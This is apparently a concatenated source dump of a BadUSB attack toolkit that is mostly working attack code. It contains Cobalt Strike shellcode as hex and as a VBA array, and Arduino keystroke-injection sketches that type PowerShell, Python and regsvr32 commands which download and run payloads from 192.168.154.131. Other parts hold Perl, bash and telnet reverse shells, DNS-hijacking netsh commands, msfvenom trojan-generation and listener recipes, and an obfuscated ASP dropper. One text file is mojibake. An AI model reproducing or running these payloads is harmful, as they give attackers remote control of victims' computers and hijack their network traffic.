x42\x66\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e
\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00 ================================================ FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.vba ================================================ myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _ 13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _ -42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _ -117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _ 
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,36,5,0,0,83,80,104,87,-119,-97, _ -58,-1,-43,-21,112,91,49,-46,82,104,0,2,96,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _ 104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _ -43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _ -1,-1,47,86,110,82,70,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _ 105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _ 105,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _ 83,73,69,32,49,48,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,50,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114, _ 105,100,101,110,116,47,54,46,48,41,13,10,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _ 111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _ 111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _ 111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _ 111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _ 111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _ 
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _ -123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,57,50,46,49,54,56,46,49,53,52,46,49,51,49,0,0,0,0,0) ================================================ FILE: CobaltStrike_Trojanlinkage/PSL_TrojanExecution (LinkageWithCS).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.154.131:80/c'))\""); //访问Web Delivery-psl,恶意网址按照实际更改 delay(200); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: CobaltStrike_Trojanlinkage/PY_TrojanExecution (LinkageWithCS).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("python -c \"import urllib2; exec urllib2.urlopen('http://192.168.154.131:80/d').read();\""); //访问Web Delivery-py,恶意网址按照实际更改 delay(200); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: CobaltStrike_Trojanlinkage/Pl_TrojanExecution (LinkageWithCS).ino ================================================ #include void setup() {//初始化 
Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"IP:port");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"); //访问Web Delivery-Perl,恶意网址按照实际更改 delay(200); //Keyboard.println("./hacked.pl"); //delay(200); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: CobaltStrike_Trojanlinkage/Regsvr32_TrojanExecution (LinkageWithCS).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("regsvr32 /s /n /u /i:http://192.168.154.131:80/e scrobj.dll"); //访问Web Delivery-regsvr32,恶意网址按照实际更改 delay(200); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: CodePrincipleInterpretation/ArduinoKeyCodeBase.ino ================================================ //基础按键 KEY_LEFT_CTRL KEY_LEFT_SHIFT KEY_LEFT_ALT KEY_LEFT_GUI //win键 KEY_RIGHT_CTRL KEY_RIGHT_SHIFT KEY_RIGHT_ALT KEY_RIGHT_GUI KEY_UP_ARROW KEY_DOWN_ARROW KEY_LEFT_ARROW KEY_RIGHT_ARROW KEY_BACKSPACE KEY_TAB KEY_RETURN//回车键 KEY_ESC KEY_INSERT KEY_DELETE KEY_PAGE_UP KEY_PAGE_DOWN KEY_HOME KEY_END KEY_CAPS_LOCK KEY_F1 KEY_F2 KEY_F3 KEY_F4 KEY_F5 KEY_F6 KEY_F7 KEY_F8 KEY_F9 KEY_F10 
KEY_F11 KEY_F12 delay(5000);//延时毫秒 Keyboard.begin(); //开始键盘通讯 Keyboard.end(); //结束键盘通讯 Keyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来 Keyboard.release(); //释放键盘按键 Keyboard.println(“”); //输入字符串使用双引号括起来 Mouse.begin();//鼠标事件开始 Mouse.click();//鼠标单击 Mouse.end();//鼠标事件结束 Mouse.move();//鼠标移动(x,y) Mouse.press();//鼠标按下 Mouse.release();//鼠标松开 Mouse.isPressed(); ================================================ FILE: CodePrincipleInterpretation/InstructionsOn_setup_loop_Methods.txt ================================================ ʲôsetup setup BadusbڲϺ״ִеĴ Badusbͨʹõľsetup ֻҪд void setup(){//д} ʲôloop loopѭڲѭ£еĴѭִУдһϰF5ѭ룬ܲϺԾͻ ΪʲôBadusbһдsetup ԭܼ 㽫дloopлᵼԼҲ޷Ĵ룬ΪһĵԾͣ ôµĴ޷д룬ǿд룬ҪĻñȽϸ ================================================ FILE: CodePrincipleInterpretation/MSF_TrojanMakingTutorial.txt ================================================ msf木马制作 1、在攻击者终端操作: msfvenom -p windows/meterpreter/reverse_tcp lhost=kaliIP lport= -f exe >/root/Desktop/evilshell.exe -p 参数后跟上payload(攻击载荷) lhost 后跟监听的IP lport 后跟监听的端口 -f 后跟要生成后门文件的类型 -o 指定输出文件及类型 -i 混淆次数 -e 混淆模式 例如:exe木马: msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe -o virus.exe -e x86/shikata_ga_nai -i 8 jsp木马: msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > virus.jsp #Powershell木马: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f psh-reflection > virus.psl #JAVA木马: msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT= -f jar -o virus.jar #PHP木马: msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw -o virus.php #ASP木马: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > virus.asp #ASPX木马: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > virus.aspx #Python木马: msfvenom -p python/meterpreter/reverse_tcp LHOST= LPORT= -f raw > virus.py #Android木马: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o virus.apk #Bash木马: msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > virus.sh #Linux木马: msfvenom -p linux/x86/meterpreter/reverse_tcp 
LHOST= LPORT= -f elf > shell.elf #Mac木马: msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho #WAR木马: msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war #Perl木马: msfvenom -p cmd/unix/reverse_perl LHOST= -f raw > shell.pl 2、开启postgresql数据库:(简单攻击可省略) /etc/init.d/postgresql status 查看postgresql服务的状态 /etc/init.d/postgresql start 开启postgresql服务 netstat -ntulp 查看端口 3、启动msf监听,等待BadUSB插入,对方上线: msfconsole 开启MSF msf5>use exploit/multi/handler 选择exploits msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 设置payload,注意与上方payload相同 show options 查看所需设置的参数 set lhost KaliIP (设置监听地址,注意与上方lhost相同) set lport 设置监听端口 run 或者exploit 运行攻击模块 ================================================ FILE: DNSHijack/DOS_CommandSetMultipleDNS(DNSHijack).ino ================================================ void setup() { Keyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.println("cmd /c netsh interface ip set dns \"Local Area Connection\" static 127.0.0.1-192.168.1.1&&netsh interface ip set dns \"????\" static 127.0.0.1-192.168.1.1"); //DOS命令设置多个DNS Keyboard.end(); } void loop() { } ================================================ FILE: DNSHijack/PSL_CommandSetMultipleDNS(DNSHijack).ino ================================================ void setup(){ Keyboard.begin(); delay(3000); Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS"); Keyboard.println(); delay(1000); Keyboard.press(KEY_LEFT_ALT); Keyboard.print('y'); Keyboard.release(KEY_LEFT_ALT); delay(500); Keyboard.println("CMD"); delay(50); Keyboard.println("NETSH INTERFACE IP SET DNS \"lOCAL aREA 
cCONNECTION\" STATIC 127.0.0.1-192.168.1.1&&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop(){ } ================================================ FILE: LICENSE ================================================ BSD 3-Clause License Copyright (c) 2021, wwy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
================================================ FILE: Linux_Built-inReverseShell/LinuxReverseShell (CodeExecution).ino ================================================ void setup() { delay(5000); terminal(); delay(3000); Keyboard.println("echo INPUT0 > /tmp/pay"); delay(100); Keyboard.println("echo INPUT1 >> /tmp/pay"); delay(100); Keyboard.println("echo INPUT2 >> /tmp/pay"); delay(100); Keyboard.println("echo INPUT3 >> /tmp/pay"); delay(100); Keyboard.println("echo INPUT4 >> /tmp/pay"); delay(100); Keyboard.println("echo INPUT5 >> /tmp/pay"); delay(100); Keyboard.println("echo INPUT6 >> /tmp/pay"); delay(2000); Keyboard.println("xxd -r -p /tmp/pay /tmp/payload"); delay(2000); Keyboard.println("chmod +x /tmp/payload"); Keyboard.println("/tmp/payload &"); delay(2000); Keyboard.println("exit"); } void loop() { } void terminal() { Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); Keyboard.send_now(); Keyboard.set_key1(KEY_T); Keyboard.send_now(); delay(100); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } ================================================ FILE: Linux_Built-inReverseShell/LinuxReverseShell(BashShell).ino ================================================ # define PAYLOAD1 "mknod bp1 p && nc INPUT0 INPUT1 0bp1 &" //# define PAYLOAD2 "/bin/bash -i > /dev/tcp/192.168.1.40/8080 0<&1 2>&1 &" #define PAYLOAD3 "mknod bp2 p && telnet INPUT2 INPUT3 0bp2 &" void setup() { delay(5000); terminal(); delay(3000); Keyboard.println(PAYLOAD1); delay(2000); //Keyboard.println(PAYLOAD2); //delay(2000); Keyboard.println(PAYLOAD3); delay(2000); Keyboard.println("exit"); } void loop() { } void terminal() { Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); Keyboard.send_now(); Keyboard.set_key1(KEY_T); Keyboard.send_now(); delay(100); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } 
================================================ FILE: Linux_Built-inReverseShell/LinuxReverseShell(PerlShell).ino ================================================ void setup() { delay(5000); terminal(); delay(3000); Keyboard.print("perl -MIO -e '$p=fork;exit,if"); delay(100); Keyboard.print("($p);$c=new IO::Socket::INET"); delay(100); Keyboard.print("(PeerAddr,\"INPUT0:INPUT1\""); delay(100); Keyboard.print(");STDIN->fdopen($c,r);$~->"); delay(100); Keyboard.print("fdopen($c,w);system$_ "); delay(100); Keyboard.println("while<>;'"); delay(1000); Keyboard.println("exit"); } void loop() { } void terminal() { Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); Keyboard.send_now(); Keyboard.set_key1(KEY_T); Keyboard.send_now(); delay(100); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } ================================================ FILE: MSF_Trojanlinkage/Shell_TrojanGenerationConfiguration.txt ================================================ IP192.168.43.242 port4444 exeľ msfvenom -p windows/meterpreter/reverse_tcp lhost= lport= -f exe -o shell.exe -e x86/shikata_ga_nai -i 8 jspľ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp #Powershellľ: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f psh-reflection > shell.psl #JAVAľ: msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT= -f jar -o shell.jar #PHPľ: msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw -o shell.php #ASPľ: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp #ASPXľ: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx #Pythonľ: msfvenom -p python/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.py #Androidľ: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= -o shell.apk #Bashľ: msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh #Linuxľ msfvenom -p linux/x86/meterpreter/reverse_tcp 
LHOST= LPORT= -f elf > shell.elf #Macľ msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho #WARľ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war #Perlľ msfvenom -p cmd/unix/reverse_perl LHOST= -f raw > shell.pl ================================================ FILE: MSF_Trojanlinkage/shell.asp ================================================ <% @language="VBScript" %> <% Sub gJjCrDeBtLBn() wvWPLP=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(128)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101) wvWPLP=wvWPLP&Chr(32)&Chr(114)&Chr(117)&Chr(110)&Chr(32)&Chr(105)&Chr(110)&Chr(32)&Chr(68)&Chr(79)&Chr(83)&Chr(32)&Chr(109)&Chr(111)&Chr(100)&Chr(101)&Chr(46)&Chr(13)&Chr(13)&Chr(10)&Chr(36)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(80)&Chr(69)&Chr(0)&Chr(0)&Chr(76)&Chr(1)&Chr(3)&Chr(0)&Chr(97)&Chr(144)&Chr(140)&Chr(129)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(224)&Chr(0)&Chr(15)&Chr(3)&Chr(11)&Chr(1)&Chr(2)&Chr(56)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(1)&Chr(0)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(70)&Chr(58)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0) wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(46)&Chr(116)&Chr(101)&Chr(120)&Chr(116)&Chr(0)&Chr(0)&Chr(0)&Chr(40)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0) 
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(96)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(144)&Chr(10)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(12)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(224)&Chr(46)&Chr(105)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(48)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0) 